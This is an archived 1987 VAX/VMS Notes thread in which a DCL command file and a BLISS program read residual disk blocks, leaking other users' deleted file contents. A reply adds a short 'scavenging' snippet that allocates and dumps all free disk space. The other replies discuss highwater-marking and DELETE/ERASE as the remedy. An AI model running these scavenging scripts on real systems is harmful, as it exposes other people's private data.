Conference noted::hackers_v1

397.0. "random source of data ?" by VIDEO::OSMAN (and silos to fill before I feep, and silos to fill before I feep) Tue Feb 03 1987 16:30

$!
$!	Why does this command file print out what it does ?
$!
$!	It only exhibits its amazing behavior if you run it on a
$!	"busy" system.
$!
$!	Author: Eric Osman 2/3/87
$!
$ if f$search ("foo.b32") .eqs. "" then goto make_it
$ checksum foo.b32
$ if checksum$checksum .nes. "2018269209" then goto make_it
$ got_it:
$ ctr = 0
$ if f$search ("foo.bar") .nes. "" then delete foo.bar.*
$ create foo.bar
$ set file/ver=10 foo.bar
$ lup:
$ copy/allocate=1 nl: foo.bar
$ set file/end foo.bar
$ define/user sys$output nl:
$ run foo
g
set out log
set log sys$command:
e/ascii:200 foo
$ write sys$output "--------------------------------------------"
$ ctr = ctr + 1
$ if ctr .lt. 100 then goto lup
$ exit
$ make_it:
$ create foo.b32
module foo (
	main = beg,
	addressing_mode (
	    external = general,
	    nonexternal = general

	)) = begin

library 'sys$library:starlet';
routine map_mem =

	begin

	literal

	    ! Room for section pages
	    sec_len = 1000000;

	local

	    s,
	    beg_and_end : vector [2],
	    actual_beg_and_end : vector [2],
	    file_chan;

literal foo = 3000000;
    own
	    sec : ref vector [sec_len] initial (foo),
	INFAB: $FAB(FNM='foo.bar',
		fop = ufo	! user file open
		),	! input file fab
	INRAB: $RAB(			! input file rab
		    FAB=INFAB,
		    MBC=40,
		    USZ=512);

	if not (s = $OPEN(FAB=INFAB))
	then signal (.s);

	! Initialize beginning and ending addresses.
	!
	beg_and_end[0] = sec[0];
	beg_and_end[1] = sec[sec_len] - 1;

	! Get channel.
	!
	file_chan = .infab[fab$l_stv];

	if not (s = $crmpsc (
	    inadr = beg_and_end[0],
	    retadr = actual_beg_and_end[0],
	    acmode = 0,
	    flags = 0,
	    gsdnam = %ascid 'go_memory',
	    ident = 0,
	    relpag = 0,
	    chan = .file_chan,
	    pagcnt = 20,
	    vbn = 0,
	    prot = 0,
	    pfc = 0
	    ))
	then
	    signal (.s)
	else .s

	end;

routine beg = map_mem ();

end
eludom
$ bliss/deb foo
$ link/deb foo
$ checksum foo.b32
$ show sym checksum$checksum
$ goto got_it

Looks pretty dull if highwater-marking is turned on.  There are
easier ways to go a'scavenging if it's not.

-piper

    But might it permit you to see data you weren't supposed to see?
    Like someone else's file that is protected against you ?
    
    /Eric

Yes, it's a security hole, and that's why you turn on highwater-marking
if you're worried about it.  You'll only see others' deleted files, and
DELETE/ERASE will stifle that.

If you want to go big-time scavenging

  $ size = f$getdvi(disk,"Freeblocks") - f$getdvi(disk,"Cluster")
  $! if quotas exist, SIZE is what's left minus a couple
  $ copy /allocate='size' nl: foo.bar
  $ set file /end foo.bar
  $ dump foo.bar

I once recovered an accidentally deleted file with a similar scheme,
DUMPing and SEARCHing block by block until we zeroed in on it.  Not
elegant, but we got it back.

-piper

If its a security hole, then shouldn't high water marking or whatever
it is be the default ?  Let those customers that want a security problem
set it the dangerous way.  Let unwary customers have the secure
setting.

/Eric

    
    High water marking is the default, as of VMS V4.0, when it was
    introduced. Most system managers turn it off, because it has quite
    an impact on performance.
    
    Trev